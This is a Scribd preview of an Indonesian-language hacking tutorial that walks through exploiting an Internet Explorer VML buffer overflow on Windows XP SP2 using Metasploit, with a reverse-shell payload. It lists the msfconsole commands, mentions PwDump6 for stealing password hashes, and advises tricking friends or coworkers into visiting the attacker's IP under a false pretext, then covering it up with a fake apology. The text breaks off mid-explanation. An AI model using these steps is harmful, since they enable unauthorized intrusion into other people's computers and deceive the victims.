Welcome to Scribd, the world's digital library. Read, publish, and share books and documents. See more
Download
Standard view
Full view
of .
Look up keyword
Like this
5Activity
0 of .
Results for:
No results containing your search query
P. 1
Belajar Hack Yuck

Belajar Hack Yuck

Ratings:

5.0

(1)
|Views: 303|Likes:
Published by sector31

More info:

Published by: sector31 on Nov 15, 2008
Copyright:Attribution Non-commercial

Availability:

Read on Scribd mobile: iPhone, iPad and Android.
download as DOC, PDF, TXT or read online from Scribd
See more
See less

08/22/2010

pdf

text

original

 
14 11 2006
*Fyuhh… akhirnya sempet juga nyelesain tulisan ini. Yosh.. here is the prof of concept!.
Disclaimer:
This document was written in the interest of education. The author cannot beheld responsible for how the topics discussed in this document are applied.Setelah mengetahui sedikit dan konsep dasar ‘standar’ mengenai hack yang dibahasdibagian pertama dan mengetahui sedikit materi mengenai exploit pada bagian kedua,sekarang langsung aja kita praktek. Disini saya sengaja menggunakanVMWareuntuk melakukan simulasi, karena tidak semua orang dapat mempraktekannya dalam suatu jaringan. Dengan menggunakan VMWare, kita dapat mensimulasikan jaringan sederhanayang seolah-olah ada suatu jaringan yang terdiri dari komputer kita sendiri dan komputer lainnya. Bagi yang belum bisa menggunakan VMWare, coba cari diinternet! SistemOperasi yang saya gunakan adalah Windows XP SP2.
Tools
yang saya gunakan adalahMetasploit Framework untuk melakukan exploit sertaPwDump6untuk mengambil hash file dari komputer target. Apa itu MetasploitFramework ?
The Metasploit Framework is a complete environment for writing, testing, and using exploit code. This environment provides a solid platform for penetrationtesting, shellcodedevelopment, and vulnerability research.
Untuk penggunaan lebih lanjut mengenai Metasploit, anda dapat membacadokomentasi yang juga diikutsertakan dalam instalasi. Untuk melakukan instalasi metasploit versi 2.7,dibutuhkan user administrator. Sebelumnya saya mencoba menginstall dengan ‘limiteduser’ tapi setelah diinstall tidak bisa dijalankan. Sebenarnya instalasi metasploit ini hanyamengekstrak file saja. Jadi anda dapat menginstallnya tanpa harus mendapatkan user admin serta meletakkannya dimanapun tanpa harus menginstal di Folder Program Files. Namun setelah sedikit dioprek, ternyata tidak harus admin yang bisa menjalankan. Agak ribet dan males juga sih nulis disini, soalnya ketika mencoba versi terbaru, yaituversi 3 Beta 3, kita dapat menjalankannya tanpa harus menginstall dengan user admin. Gitu ajako repot! Lagipula versi 3 (skarang msh beta) lebih keren dan fiturnya lebih banyak. Tapisayangnya untuk msfweb (versi webnya) belum bisa dijalankan sepenuhnya.Ok.. sekarang saya asumsikan anda telah membaca userguide metasploit (ah.. palingasumsi saya salah ;p). Biar lebih keliatan keren dan memahami detailnya, sayamenjelaskan metasplooit yang menggunakan console (mfsconsole) saja. Metasploitmenggunakancygwinuntuk menjalankannya, karena metasploit dibuat menggunakanPerl. Sekarang mari kita praktekkan!!Pertama2 jalankan ‘mfsconsole’!
 
Untuk mempelajari command apa saja yang ada di MSFConsole gunakan perintah ‘help’.Karena komputer yang ingin dijadikan target adalah Windows XP SP2, maka digunakanexploit yang berpengaruh terhadap XP SP2 yaitu dengan memanfaatkan kelemahan pada
. 
This module exploits a code execution vulnerability in Microsoft Internet Explorer using a buffer overflow in the VML processing code (VGX.dll). This module has been tested onWindows 2000 SP4, Windows XP SP0, and Windows XP SP2.
Untuk melihat info dari exploit ini gunakan perintah :msf > info ie_vml_rectfillExploit
ie_vml_rectfill 
memanfaatkan kelemahan pada Internet Explorer. Oleh karena itu,exploit ini akan berpengaruh jika komputer target menjalankan IE dan mengarahkan url-nya ke komputer penyerang. Untuk itu, kita harus menggunakan sedikit
‘social engineering’ 
, seperti jika di kost/lab/kantor kita bilang ke teman kita bahwa kita sedangmencoba membuat aplikasi web terbaru, lalu minta tolong dilihat menggunakan IE kealamat IP (atau nama komputer) kita. Misalkan http://192.168.186.1. Biasanya setelahexploit ini dijalankan dan komputer target telah terhubung, maka IE akan crash. Biarkan beberapa saat untuk membiarkan exploit ‘bekerja’. Setelah beberapa saat bilang aja
 
“wah.. ada error nih. Ok deh.. saya coba betulin dulu… makasih ya”. Baru tutup IE-nya pake Task Manager (walaupun pake TM, IE msh sulit di-kill, jangan lupa untuk me-’end process’-kan ‘dumpred.exe’ juga, tapi setelah exploit bekerja ).Untuk menggunakan exploit gunakan perintah2 berikut dalam console :msf > use_ie_vml_rectfillmsf > set PAYLOAD win32_reversemsf > set RHOST ip_targetmsf > set LHOST ip_penyerangmsf > exploitHasilnya akan tampak seperti gambar berikut :Dalam contoh diatas, IP komputer target (RHOST) adalah 192.168.186.128, sedangkankomputer penyerang (LHOST) adalah 192.168.186.1. Lalu ‘payload’ yang digunakan

Activity (5)

You've already reviewed this. Edit your review.
1 thousand reads
1 hundred reads
raja_gila50 liked this
romiswara liked this
J-han Baez liked this

You're Reading a Free Preview

Download
scribd
/*********** DO NOT ALTER ANYTHING BELOW THIS LINE ! ************/ var s_code=s.t();if(s_code)document.write(s_code)//-->